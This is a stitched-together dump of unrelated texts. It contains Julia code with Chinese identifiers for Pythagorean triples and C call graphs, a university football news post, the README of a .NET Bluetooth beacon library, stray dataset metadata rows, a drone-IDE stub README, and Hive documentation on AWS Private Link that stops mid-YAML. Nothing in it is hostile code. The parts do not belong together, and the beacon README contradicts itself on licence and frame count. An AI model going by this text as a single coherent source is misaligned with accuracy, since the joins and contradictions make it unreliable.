function 计算大指数(底数::Int,指数::Int) a::BigInt=底数;return a^指数 end
function test()
num::BigInt=2^30 #计算大指数(2,100) ;
#寻找勾股数(num)
寻找勾股数(100_0000)
end
io=open("tmp1.txt","w+") #io must be defined at global scope
@time test()
close(io)
```
## Function call graph
```julia
"""
Build a function call graph.
Steps:
    1 collect all files in this directory
    2 extract the function-call relations from each file
    3 convert the extracted relations to dot format
Motivation:
    writing dot by hand is no more convenient
    than a graphical tool, so generate it instead
"""
function build_function_struct_graph()
function get_path(c::Channel)
#defaults to the current directory
for (root,dirs,files) in walkdir(".") # 1
for file in files
path=(root*"/"*file)
put!(c ,path)
end
end
end
function 函数内容提取(file_str) #2.1
# extract complete function bodies, e.g. asd(){ ... }
rx=r"\w+?\(.*?\)\s*?\{(.|\n)*?\}"
#word boundary; no space allowed in word{ ... }
#the hard part of regexes: you must cover every case,
#no more and no less
m=eachmatch(rx,file_str)
return collect(m)
end
function 函数识别(item)
#2.2
#recognize the functions in str and return a list of function names
#shape: a->{b,v,c,,d,s;b->{}}
rx=r"\w+?\("
m=eachmatch(rx,item)
vec= collect(m)
repr="\""*(popfirst!(vec).match)*")\"->"
for item in vec
repr=repr*"\""*(item.match)*")\","
end
return repr
end
function get_func_relation(file_path) # 2
relation= ""
@info file_path
file_str=""
for line in eachline(file_path,keep=true)
#keep=true: preserve newline characters
file_str=file_str*line
end
for item in 函数内容提取(file_str)
str_exp=函数识别(item.match)
#item is a RegexMatch; item.match holds the matched substring
str_exp=chop(str_exp) #chop: drop the trailing comma or ->
relation=relation*(endswith(str_exp,"-") ? chop(str_exp) : str_exp)*";"
#after chop there are two cases: -> became -, or a trailing , was removed
end
return relation #shape: a->b,v,c,,d,s;b->,; a->b,v,c,,d,s;b->{}
end
function 文件类型确认(file_name)
if !isfile(file_name) return false; end
if endswith(file_name,".c")
return true
else
return false
end
end
str_repr=""
for path_file in Channel(get_path)
if !文件类型确认(path_file) #skip config files and other irrelevant items
continue
end
tmp=get_func_relation(path_file)
str_repr=str_repr*"\n"*tmp
#break #process only one C file
end
str_repr="digraph function { \n "*str_repr*"\n }"
#@show str_repr
#写入文件
write("tmp.gv",str_repr)
@info "文件写入完成"
end
build_function_struct_graph()
#ERROR: LoadError: PCRE.exec error: JIT stack limit reached
#caused by too many files in the directory
#command to render the graph:
# dot -Tsvg tmp.gv -O
#open question: how to exclude statements such as
# if(){} switch(){} ...
```
### Three examples:
- The first three images show the three subdirectories of systemd/src
- Very wide images may render poorly; see the src-*.svg files under pict/ instead
- If a local image viewer displays them incorrectly, open them with Firefox.
- The fourth image is a simple vertical example




---
templateKey: "news-post"
featuredpost: false
tags:
- migrated
date: 2016-09-21T00:00:00.000Z
title: Hurricanes Football Names Players of the Week
image: 2016-09-21-one.jpg
---
**Tuesday, September 20, 2016. Charlottetown –** Running back Andre Goulbourne, defensive end Liam Carter, and receiver Eugune McMinns, are the players of the week for the Hurricanes Football team. Andre Goulbourne had 13 carries for 120 yards; Carter had 2 quarterback sacks, 3 solo tackles and 6 shared tackles; and McMinns had kickoff and punt returns for 200 yards, and a kickoff return for an 80-yard touchdown in last Saturday’s game against the UNB Fredericton Red Bombers. The team’s first home game is this Saturday at 1 p.m. at UPEI Alumni Canada Games Place.
# Universal Bluetooth Beacon Library
Manage Bluetooth® Beacons through a cross-platform .NET Standard library. Get details for the open Eddystone™ Bluetooth beacon format from Google, as well as beacons comparable to Apple® iBeacon™. Supported on all platforms that are compatible to .NET Standard 1.3/2.0+ - including Windows 10, Xamarin (iOS, Android), Mac and Linux.
Directly use the received Bluetooth Low Energy Advertisement notifications from the base operating system and let the library take care of the rest for you. It extracts, combines and updates unique beacons, associates individual frames with those beacons and parses their contents - e.g., the beacon IDs, URLs or telemetry information like temperature or battery voltage.
[NuGet Library Download](https://www.nuget.org/packages/UniversalBeaconLibrary) | [Windows 10 Example App Download](https://www.microsoft.com/store/apps/9NBLGGH1Z24K)
## Background - Bluetooth Beacons
Bluetooth Low Energy / LE (BLE) allows objects to be discovered - for example, it enables your phone to connect to a heart rate belt or a headset. A Bluetooth Beacon does not connect to your phone; instead, it continuously transmits small amounts of data - no matter if someone is listening or not. The efficient nature of Bluetooth ensures that the battery of a beacon nevertheless lasts several months.
Phones and apps can react to Bluetooth Beacons - e.g., to trigger specific actions when the user is close to a physical location. In contrast to GPS, this works even indoors and has a much better accuracy.
To differentiate between different beacons and to give each one a unique meaning in your virtual world, beacons send out information packages. These are formatted according to a certain specification. While the general way of broadcasting these information packages is standardized by the Bluetooth Core specification, the beacon package contents are not. Platforms like Windows 10 come with APIs to receive Bluetooth LE advertisements, but does not contain an SDK to work with common beacon protocols.
## The Universal Beacon Library
Provides an easy way for C#/.NET apps to manage beacons and to parse their information packages.
As a developer, you only have to feed the received Bluetooth advertisements into the library - it will analyze, cluster and parse the contents, so that you can easily access the latest data from each individual beacon.
Clustering is achieved through the Bluetooth address (MAC): the constant and regular advertisements of multiple beacons are matched to unique beacons.
The next step is analyzing the contents of the advertisement payloads. The library can work with data comparable to Apple iBeacon (Proximity Beacon) frames, as well as the open [Eddystone specification](https://github.com/google/eddystone), including the four frame types that have been defined:
* UID frames
* URL frames
* TLM (Telemetry) frames
* EID frames
Instead of having to implement the specifications yourself and worry about encodings and byte orderings, you can directly access the latest available information through convenient classes and properties. For unknown frames of other beacon types, it's easy to extend the library to parse the payload in a derived beacon frame class and make use of the beacon management and information update features of the library.
Note: for using Apple iBeacon technology in your services (in order to make your services compatible to iOS devices), you need to agree to and comply with the [Apple iBeacon license agreement](https://developer.apple.com/ibeacon/).
## Feature Overview
- Directly analyzes received Bluetooth LE advertisements (e.g., `BluetoothLEAdvertisementReceivedEventArgs` for UWP apps)
- Clusters based on Bluetooth MAC address and keeps frame types up to date with the latest information
- Retrieve Bluetooth address (MAC), signal strength (RSSI) and latest update timestamp for each beacon
- Parses individual advertisement frame contents
- Eddystone UID frame:
- Ranging data
- Namespace ID
- Instance ID
- Eddystone Telemetry (TLM) frame:
- Version
- Battery [V]
- Beacon temperature [°C]
- Count of advertisement frames sent since power up
- Time since power up
- Eddystone URL frame:
- Ranging data
- Complete URL
- Eddystone EID frame:
- Ranging data
- Ephemeral Identifier
- Proximity Beacon Frames (comparable to the Apple iBeacon format)
- Uuid
- Major ID
- Minor ID
- Raw payload for all other beacons
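For a flavor of what the URL-frame parsing involves: per the public Eddystone-URL specification, the URL is compressed into a one-byte scheme prefix followed by characters in which certain byte values stand for common expansions. A minimal standalone decoder might look like this (Python, purely illustrative; this is not the library's actual API, and the function name is mine):

```python
# Scheme prefixes and expansion codes from the public Eddystone-URL spec.
SCHEMES = ["http://www.", "https://www.", "http://", "https://"]
EXPANSIONS = [".com/", ".org/", ".edu/", ".net/", ".info/", ".biz/", ".gov/",
              ".com", ".org", ".edu", ".net", ".info", ".biz", ".gov"]

def decode_eddystone_url(payload: bytes) -> str:
    """Decode the encoded-URL part of an Eddystone URL frame
    (the bytes after the frame type and TX power fields)."""
    url = SCHEMES[payload[0]]
    for b in payload[1:]:
        url += EXPANSIONS[b] if b < len(EXPANSIONS) else chr(b)
    return url

print(decode_eddystone_url(bytes([0x00]) + b"example" + bytes([0x07])))
# prints "http://www.example.com"
```

The library performs this expansion for you and exposes the result as the `CompleteUrl` property of the URL frame.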
## Example Apps
The included example apps continuously scan for Bluetooth LE advertisements. They associate these with known or new Bluetooth MAC addresses to identify beacons. The individual advertisement frames are then parsed for known frame types - which are currently the three frame types defined by the Eddystone beacon format by Google, as well as Proximity Beacon frames (compatible to iBeacons).
The example app comes in two versions:
1. WindowsBeacons: Universal Windows app (UWP) called Bluetooth Beacon Interactor. The app has been tested on Windows 10 tablets and phones and requires Bluetooth LE (BLE) capable hardware. Make sure your device has Bluetooth activated (in Windows settings and also in hardware in case your device allows turning off bluetooth using a key combination) and is not in airplane mode. Download and test the example app from the Windows 10 store: https://www.microsoft.com/store/apps/9NBLGGH1Z24K
2. UniversalBeacon: Cross-Platform implementation with Xamarin. Core part in UniversalBeacon.Sample project. Platform-specific implementations in UniversalBeacon.Sample.Android and UniversalBeacon.Sample.UWP. iOS version is coming later. The Xamarin sample apps currently have a simpler UI than the UWP sample app.
### Permissions and Privacy Settings in Windows 10
To allow apps to receive data from Bluetooth Beacons, you have to ensure Windows 10 is configured correctly.
1. Turn off flight mode: Settings -> Network & Internet -> Flight mode
2. Turn on Bluetooth: Settings -> Devices -> Bluetooth
3. Turn on Device Sync: Settings -> Privacy -> Other devices -> Sync with devices (Example: beacons).
### Bluetooth on Android
Make sure that you activate Bluetooth on your Android device prior to running the example app. The app doesn't currently check if Bluetooth is active on your phone and you would otherwise get an exception about a missing "BLUETOOTH_PRIVILEGED" permission. This is unrelated to the actual Bluetooth Beacon library and just a small current limitation of the example.
## Usage example (C#)
### Registering for beacons and handling the data (C#, UWP)
```csharp
public sealed partial class MainPage : Page
{
// Bluetooth Beacons
private readonly BluetoothLEAdvertisementWatcher _watcher;
private readonly BeaconManager _beaconManager;
public MainPage()
{
// [...]
// Construct the Universal Bluetooth Beacon manager
var provider = new WindowsBluetoothPacketProvider();
_beaconManager = new BeaconManager(provider);
_beaconManager.BeaconAdded += BeaconManagerOnBeaconAdded;
_beaconManager.Start();
}
        // Invoked whenever the manager discovers a new beacon
private void BeaconManagerOnBeaconAdded(object sender, Beacon beacon)
{
Debug.WriteLine("\nBeacon: " + beacon.BluetoothAddressAsString);
Debug.WriteLine("Type: " + beacon.BeaconType);
Debug.WriteLine("Last Update: " + beacon.Timestamp);
Debug.WriteLine("RSSI: " + beacon.Rssi);
foreach (var beaconFrame in beacon.BeaconFrames.ToList())
{
// Print a small sample of the available data parsed by the library
if (beaconFrame is UidEddystoneFrame)
{
Debug.WriteLine("Eddystone UID Frame");
Debug.WriteLine("ID: " + ((UidEddystoneFrame)beaconFrame).NamespaceIdAsNumber.ToString("X") + " / " +
((UidEddystoneFrame)beaconFrame).InstanceIdAsNumber.ToString("X"));
}
else if (beaconFrame is UrlEddystoneFrame)
{
Debug.WriteLine("Eddystone URL Frame");
Debug.WriteLine("URL: " + ((UrlEddystoneFrame)beaconFrame).CompleteUrl);
}
else if (beaconFrame is TlmEddystoneFrame)
{
Debug.WriteLine("Eddystone Telemetry Frame");
Debug.WriteLine("Temperature [°C]: " + ((TlmEddystoneFrame)beaconFrame).TemperatureInC);
Debug.WriteLine("Battery [mV]: " + ((TlmEddystoneFrame)beaconFrame).BatteryInMilliV);
}
else if (beaconFrame is EidEddystoneFrame)
{
Debug.WriteLine("Eddystone EID Frame");
Debug.WriteLine("Ranging Data: " + ((EidEddystoneFrame)beaconFrame).RangingData);
Debug.WriteLine("Ephemeral Identifier: " + BitConverter.ToString(((EidEddystoneFrame)beaconFrame).EphemeralIdentifier));
}
else if (beaconFrame is ProximityBeaconFrame)
{
Debug.WriteLine("Proximity Beacon Frame (iBeacon compatible)");
Debug.WriteLine("Uuid: " + ((ProximityBeaconFrame)beaconFrame).UuidAsString);
Debug.WriteLine("Major: " + ((ProximityBeaconFrame)beaconFrame).MajorAsString);
                Debug.WriteLine("Minor: " + ((ProximityBeaconFrame)beaconFrame).MinorAsString);
}
else
{
Debug.WriteLine("Unknown frame - not parsed by the library, write your own derived beacon frame type!");
Debug.WriteLine("Payload: " + BitConverter.ToString(((UnknownBeaconFrame)beaconFrame).Payload));
}
}
}
}
```
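For reference, the telemetry values exposed by `TlmEddystoneFrame` come from fixed-point fields defined by the public Eddystone-TLM specification: battery voltage is a big-endian uint16 in mV, temperature is a signed 8.8 fixed-point value, and uptime is counted in 0.1 s ticks. A standalone decoding sketch (Python, illustrative only; not the library's internal code, and the function name is mine):

```python
import struct

def decode_tlm(frame: bytes) -> dict:
    """Decode an unencrypted Eddystone TLM frame, starting at the
    frame-type byte (0x20). Field layout per the public spec."""
    ftype, version, batt_mv, temp_raw, adv_cnt, sec_cnt = \
        struct.unpack(">BBHhII", frame[:14])
    if ftype != 0x20 or version != 0x00:
        raise ValueError("not a plain TLM frame")
    return {
        "battery_mv": batt_mv,
        "temperature_c": temp_raw / 256.0,  # signed 8.8 fixed point
        "adv_count": adv_cnt,
        "uptime_s": sec_cnt / 10.0,         # SEC_CNT ticks are 0.1 s
    }
```

In the library these conversions are already done for you and surfaced as `BatteryInMilliV`, `TemperatureInC` and the advertisement/uptime counters.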
## Availability
The Core Universal Beacon Library is available in C# for .NET Standard 2.0 - it is therefore compatible to Windows UWP, Xamarin (Android / iOS / UWP / Mac / Linux) and other platforms supported by .NET Standard. Extension libraries are currently included for UWP and Xamarin/Android to interface with the platform Bluetooth APIs.
To keep up to date, either watch this project or [follow me on Twitter](https://twitter.com/andijakl).
## Installation
If you want to use the Universal Beacon Library from your own app, the easiest option is to use the NuGet package manager in Visual Studio 2015 to automatically download & integrate the library:
1. Tools -> NuGet Package Manager -> Manage NuGet Packages for Solution...
2. Search "Online" for "Universal Bluetooth Beacon Library"
3. Install the library.
Alternatively, use the NuGet Package Manager console as described here: https://www.nuget.org/packages/UniversalBeaconLibrary
To try the Xamarin (Android / UWP) or Windows 10 (UWP) example apps, download the complete library package from this site.
## Version History
### 4.0.0 - March 2019
* New library structure, adds support for Xamarin
* Upgrade to .net Standard 2.0.
* License change to MIT for the complete library
### 3.2.0 - August 2017
* Add support for Eddystone EID frame type: https://github.com/google/eddystone/tree/master/eddystone-eid
* Additional check for type in IsValid implementation of Eddystone frame types
### 3.1.0 - August 2017
* Improve events provided by cross-platform interop code to surface more events to the custom app implementation. Based on these improvements, the UWP example app now again correctly displays status and error messages.
* Adds BeaconAdded event to the BeaconManager class
* Updated sample code to also include handling Proximity Beacon frames (iBeacon compatible)
* UWP Sample app handles additional Bluetooth error status codes
### 3.0.0 - August 2017
* Port from UWP to .NET Standard 1.3, for cross platform compatibility to Windows, Linux, Mac and Xamarin (iOS, Android)
* Library split into core .NET Standard library, plus platform extension libraries for Android and UWP
* New Xamarin example app for Android and UWP
* Some code changes needed to update from the previous to this version!
* New collaborator: Chris Tacke, https://github.com/ctacke
### 2.0.0 - April 2017
* Add support for beacons comparable to iBeacons (contribution from kobush, https://github.com/andijakl/universal-beacon/pull/4)
* Make Eddystone URLs clickable
* Updated dependencies
* Fix status bar color on Windows 10 Mobile (thanks to Jesse Leskinen for the hint https://twitter.com/jessenic/status/806869124056043521)
### 1.8.1 - February 2016
* Use sbyte instead of byte for accessing ranging data in Eddystone UID and URL frames to ease development and remove the need for manual casting.
### 1.7.0 - January 2016
* Added translations to Chinese, French, Russian and Portuguese
### 1.6.0 - January 2016
* Added translation to German
* Fix crash when a Bluetooth Beacon with no further data is found.
### 1.5.0 - December 2015
* Allow last two bytes of the Eddystone UID frame to be 0x00 0x00 for RFU, according to the specification.
Some beacons do not send these bytes; the library now allows both variants. When creating a UID record,
the library will now add the two additional bytes to conform to the spec.
### 1.4.0 - December 2015
* Fix black window background color in example app on latest Windows 10 Mobile version
### 1.3.0 - September 2015
* Example app allows clearing visible information
### 1.2.0 - August 2015
* Improvements in naming and Eddystone references
### 1.1.0 - August 2015
* Manually construct Eddystone TLM & UID frames
### 1.0.0 - August 2015
* Initial release
* Works with received Bluetooth advertisements from the Windows 10 Bluetooth LE API
* Combines individual received frames based on the Bluetooth MAC address to associate them with unique beacons
* Support for parsing Google Eddystone URL, UID and TLM frames
## Status & Roadmap
The Universal Bluetooth Beacon library is classified as a stable release and is in use in several projects, most importantly [Bluetooth Beacon Interactor](https://www.microsoft.com/store/apps/9NBLGGH1Z24K) for Windows 10.
Any open issues as well as planned features are tracked online:
https://github.com/andijakl/universal-beacon/issues
## License & Related Information
The library is released under the Apache license and is partly based on the [Eddystone™](https://github.com/google/eddystone) specification, which is also released under Apache license - see the LICENSE file for details.
iBeacon™ is a trademark of Apple Inc. Bluetooth® is a registered trademark of Bluetooth SIG, Inc.
The example application is licensed under the GPL v3 license - see LICENSE.GPL for details.
Developed by Andreas Jakl and Chris Tacke
https://twitter.com/andijakl
https://www.andreasjakl.com/
Library homepage on GitHub:
https://github.com/andijakl/universal-beacon
Library package on NuGet:
https://www.nuget.org/packages/UniversalBeaconLibrary
You might also be interested in the NFC / NDEF library:
https://github.com/andijakl/ndef-nfc
| 50.416084 | 502 | 0.776822 | eng_Latn | 0.975451 |
61dcb477c204735e003fcf3f120696200381f5e5 | 40 | md | Markdown | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | # race-drone-ide
use at your own risk!
| 10 | 21 | 0.7 | eng_Latn | 0.999542 |
61dcbc8fc5cbe7ffa7a31d72685b030d4e781bc7 | 2,374 | md | Markdown | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | 1 | 2022-03-11T12:18:19.000Z | 2022-03-11T12:18:19.000Z | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | 1 | 2020-12-05T10:25:02.000Z | 2020-12-05T10:25:02.000Z | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | null | null | null | ---
title: 3D Column
order: 5
---
`markdown:docs/common/style.md`
A 3D column map displays columns of different heights above geographic areas; the height of each column is proportional to its value in the dataset.
## Usage
A 3D column map is created by instantiating a PointLayer and setting shape to one of the 3D shapes.
```javascript
import { PointLayer } from '@antv/l7';
```
<img width="60%" style="display: block;margin: 0 auto;" alt="example" src='https://gw.alipayobjects.com/mdn/antv_site/afts/img/A*RVw4QKTJe7kAAAAAAAAAAABkARQnAQ'>
### shape
The following 3D shapes are supported:
- cylinder
- triangleColumn
- hexagonColumn
- squareColumn
### size
For a 3D column, size takes three dimensions [w, l, z]:
- w: width
- l: length
- z: height
Setting size to a constant:
```javascript
layer.size([2,2,3])
```
Setting size with a callback:
```javascript
layer.size('unit_price', h => {
return [ 6, 6, h / 500 ];
})
```
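To make the mapping concrete, here is a plain-JavaScript sketch (independent of L7) of the callback used above; the sample input values are made up:

```javascript
// A plain-JS sketch of the size callback shown above: it maps a field value
// (here, a hypothetical unit_price) to the [width, length, height] triple
// that a 3D column consumes.
const toColumnSize = (h) => [6, 6, h / 500];

console.log(toColumnSize(1000)); // [ 6, 6, 2 ]
console.log(toColumnSize(250)); // [ 6, 6, 0.5 ]
```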
```javascript
const column = new PointLayer({})
.source(data)
.shape('name', [
'cylinder',
'triangleColumn',
'hexagonColumn',
'squareColumn',
])
.size('unit_price', (h) => {
return [6, 6, h / 500];
})
.color('name', ['#5B8FF9', '#70E3B5', '#FFD458', '#FF7C6A'])
.style({
opacity: 1.0,
});
```
### animate
3D columns support a grow animation.
The animate method accepts either a boolean or an options object.
<img width="60%" style="display: block;margin: 0 auto;" alt="example" src='https://gw.alipayobjects.com/mdn/rms_816329/afts/img/A*l-SUQ5nU6n8AAAAAAAAAAAAAARQnAQ'>
```javascript
animate(true)
animate(false)
animate(animateOptions)
animateOptions: {
enable: boolean;
speed?: number = 0.01;
repeat?: number = 1;
}
```
## Additional style options
- sourceColor: sets the start color of the 3D column (when a color gradient is set on a 3D column, it overrides the color set via color)
- targetColor: sets the end color of the 3D column
- opacityLinear: sets the opacity gradient of the 3D column
<img width="60%" style="display: block;margin: 0 auto;" alt="example" src='https://gw.alipayobjects.com/mdn/rms_816329/afts/img/A*oZWGSIceykwAAAAAAAAAAAAAARQnAQ'>
```javascript
style({
opacityLinear: {
enable: true, // true - false
dir: 'up', // up - down
},
});
```
- lightEnable: whether to enable lighting
```javascript
layer.style({
opacity: 0.8,
sourceColor: 'red',
targetColor: 'yellow',
});
```
[Lit column map](../../../examples/point/column#column_light)
[Gradient column map](../../../examples/point/column#column_linear)
- heightFixed: fixes the height of the 3D column (keeping a fixed Cartesian height rather than a constant pixel height)
🌟 When heightFixed is set to true, the column radius is fixed as well; supported since v2.7.12.
```javascript
style({
heightfixed: true, // default is false
});
```
- pickLight: sets whether the pick-highlight color of the 3D column takes lighting into account
🌟 pickLight controls whether lighting is applied to the pick-highlight color; supported since v2.7.12.
```javascript
style({
pickLight: true, // default is false
});
```
`markdown:docs/common/layer/base.md`
| 16.71831 | 157 | 0.655434 | yue_Hant | 0.452193 |
61dd03e6b47100521f40e531da3b9e60a4c81864 | 541 | md | Markdown | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | 1 | 2018-10-15T16:15:38.000Z | 2018-10-15T16:15:38.000Z | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: TextRange.WordsCount Property (Publisher)
keywords: vbapb10.chm5308499
f1_keywords:
- vbapb10.chm5308499
ms.prod: publisher
api_name:
- Publisher.TextRange.WordsCount
ms.assetid: 93d13801-b126-7ec9-8f79-89260f8f0140
ms.date: 06/08/2017
---
# TextRange.WordsCount Property (Publisher)
Returns the number of words in the text range represented by the parent **TextRange** object. Read-only.
## Syntax
_expression_. **WordsCount**
_expression_ A variable that represents a **TextRange** object.
### Return value
Long
| 17.451613 | 105 | 0.761553 | eng_Latn | 0.394719 |
61dd3a609a222c05d2065a52ee2e7551a637521f | 2,000 | markdown | Markdown | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | ---
layout: post
title: "Neobrutal Chessmen"
date: 2021-03-09 18:54:32 -0500
image: assets/images/fulls/1.jpg
thumbnail: /assets/img/thumbnails/chessthumb.png
caption: Chessmen
project: true
comments: false
tags: [digital fabrication, design]
---
Chess set inspired by Brutalist Architecture

Brutalism is a modernist architectural style featuring minimalist but memorable design and promoting the use of raw materials, mainly concrete. This project aims to bring the same aesthetic to a chess set that will appeal to architects, designers and other creative minds who like to play chess.

Neobrutal chess is a simple design that will look great in a studio, living room, office, etc.
<div class="sketchfab-embed-wrapper">
<iframe title="NEOBRUTAL chess set" frameborder="0" allowfullscreen mozallowfullscreen="true" webkitallowfullscreen="true" allow="fullscreen; autoplay; vr" xr-spatial-tracking execution-while-out-of-viewport execution-while-not-rendered web-share width="640" height="480" src="https://sketchfab.com/models/133e3c749063499ba171826be308ab1f/embed">
</iframe>
<p style="font-size: 13px; font-weight: normal; margin: 5px; color: #4A4A4A;">
<a href="https://sketchfab.com/3d-models/neobrutal-chess-set-133e3c749063499ba171826be308ab1f?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">NEOBRUTAL chess set</a>
by <a href="https://sketchfab.com/luigipacheco?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">luigipacheco</a>
on <a href="https://sketchfab.com?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">Sketchfab</a>
</p>
</div>
| 64.516129 | 350 | 0.7745 | eng_Latn | 0.682487 |
61ddd1c5e0763e8337f4052a09fe12b0f41cea85 | 8,666 | md | Markdown | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | null | null | null | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | 5 | 2021-09-05T00:50:13.000Z | 2022-03-04T01:38:11.000Z | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | null | null | null | # AWS Private Link
## Overview
Customers often want the core services of their OpenShift cluster to be
available only on the internal network and not on the Internet. The API server
is one such service that customers do not want to be accessible over the
Internet. The OpenShift Installer allows creating clusters that have their
services published only on the internal network by setting `publish: Internal`
in the install-config.yaml.
Since Hive is usually running outside the network where the clusters exist, it
requires access to the cluster's API server which mostly translates to having
the API reachable over the Internet. There can be some restrictions set up to
allow only Hive to access the API, but these are usually not acceptable to
security-focused customers.
AWS provides a feature called AWS Private Link ([see doc][aws-private-link-overview]) that allows
accessing private services in customer VPCs from another account using AWS's internal
networking and not the Internet. AWS Private Link involves creating a VPC
Endpoint Service in the customer's account that is backed by one or more internal
NLBs and a VPC Endpoint in the service provider's account. This allows clients in
the service provider's VPC to access the NLB-backed service in the customer's account
using the endpoint/endpoint-service Private Link. So the internal service is
now accessible to the service provider without exposing the service to the
Internet.
Using this same architecture, we create a VPC Endpoint Service / VPC Endpoint
pair to create a Private Link to the cluster's internal NLB for the k8s API server,
allowing Hive to access the API without forcing the cluster to publish it on
the Internet.
## Configuring Hive to enable AWS Private Link
To configure Hive to support Private Link in a specific region,
1. Create VPCs in that region that can be used to create VPC Endpoints.
NOTE: There is a hard limit of 255 VPC Endpoints in a region, therefore you
will need multiple VPCs to support more clusters in that region.
2. For each VPC, create subnets in all the supported availability zones of the
region.
NOTE: each subnet must have at least 255 usable IPs so the controller can create VPC Endpoints in it.
For example, let's create VPCs in the us-east-1 region, which has 6 AZs.
```txt
vpc-1 (us-east-1) : 10.0.0.0/20
subnet-11 (us-east-1a): 10.0.0.0/23
subnet-12 (us-east-1b): 10.0.2.0/23
subnet-13 (us-east-1c): 10.0.4.0/23
subnet-14 (us-east-1d): 10.0.8.0/23
subnet-15 (us-east-1e): 10.0.10.0/23
subnet-16 (us-east-1f): 10.0.12.0/23
```
```txt
vpc-2 (us-east-1) : 10.0.16.0/20
subnet-21 (us-east-1a): 10.0.16.0/23
subnet-22 (us-east-1b): 10.0.18.0/23
subnet-23 (us-east-1c): 10.0.20.0/23
subnet-24 (us-east-1d): 10.0.22.0/23
subnet-25 (us-east-1e): 10.0.24.0/23
subnet-26 (us-east-1f): 10.0.28.0/23
```
3. Make sure all the Hive environments (Hive VPCs) have network reachability to
these VPCs created above for VPC Endpoints using peering, transit gateways, etc.
4. Gather a list of VPCs that will need to resolve the DNS setup for Private
Link. This should at least include the VPC of the Hive being configured, and
can include a list of all VPCs where various Hive controllers exist.
5. Update the HiveConfig to enable Private Link for clusters in that region.
```yaml
## hiveconfig
spec:
awsPrivateLink:
## this is the inventory of VPCs that can be used to create VPC
## endpoints by the controller
endpointVPCInventory:
- region: us-east-1
vpcID: vpc-1
subnets:
- availabilityZone: us-east-1a
subnetID: subnet-11
- availabilityZone: us-east-1b
subnetID: subnet-12
- availabilityZone: us-east-1c
subnetID: subnet-13
- availabilityZone: us-east-1d
subnetID: subnet-14
- availabilityZone: us-east-1e
subnetID: subnet-15
- availabilityZone: us-east-1f
subnetID: subnet-16
- region: us-east-1
vpcID: vpc-2
subnets:
- availabilityZone: us-east-1a
subnetID: subnet-21
- availabilityZone: us-east-1b
subnetID: subnet-22
- availabilityZone: us-east-1c
subnetID: subnet-23
- availabilityZone: us-east-1d
subnetID: subnet-24
- availabilityZone: us-east-1e
subnetID: subnet-25
- availabilityZone: us-east-1f
subnetID: subnet-26
## credentialsSecretRef points to a secret with permissions to create
## resources in the account where the inventory of VPCs exists.
credentialsSecretRef:
name: < hub-account-credentials-secret-name >
## this is a list of VPCs where various Hive clusters exist.
associatedVPCs:
- region: region-hive1
vpcID: vpc-hive1
credentialsSecretRef:
name: < credentials that have access to account where Hive1 VPC exists >
- region: region-hive2
vpcID: vpc-hive2
credentialsSecretRef:
name: < credentials that have access to account where Hive2 VPC exists>
```
You can include VPCs from all the regions where Private Link is supported in the
endpointVPCInventory list. The controller will pick a VPC appropriate for the
ClusterDeployment.
### Security Groups for VPC Endpoints
Each VPC Endpoint in AWS has a Security Group attached to control access to the endpoint.
See the [docs][control-access-vpc-endpoint] for details.
When Hive creates a VPC Endpoint, it does not specify any Security Group, and therefore the
default Security Group of the VPC is attached to the VPC Endpoint. Therefore, the default
security group of the VPC where VPC Endpoints are created must have rules to allow traffic
from the Hive installer pods.
For example, if Hive is running in hive-vpc (10.1.0.0/16), there must be a rule in the default
Security Group of the VPC where the VPC Endpoint is created that allows ingress from 10.1.0.0/16.
## Using AWS Private Link
Once Hive is configured to support Private Link for AWS clusters, customers can
create ClusterDeployment objects with Private Link by setting the
`privateLink.enabled` field to `true` in the `aws` platform. This is only supported in
regions where Hive is configured to support Private Link; the validating
webhooks will reject ClusterDeployments that request Private Link in
unsupported regions.
```yaml
spec:
platform:
aws:
privateLink:
enabled: true
```
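For context, a complete ClusterDeployment carrying this flag might look like the sketch below. Every name, namespace, and secret reference here is a hypothetical placeholder — only the `platform.aws.privateLink` block is prescribed by this feature:

```yaml
apiVersion: hive.openshift.io/v1
kind: ClusterDeployment
metadata:
  name: example-cluster          # hypothetical name
  namespace: example-namespace   # hypothetical namespace
spec:
  clusterName: example-cluster
  baseDomain: example.com        # hypothetical base domain
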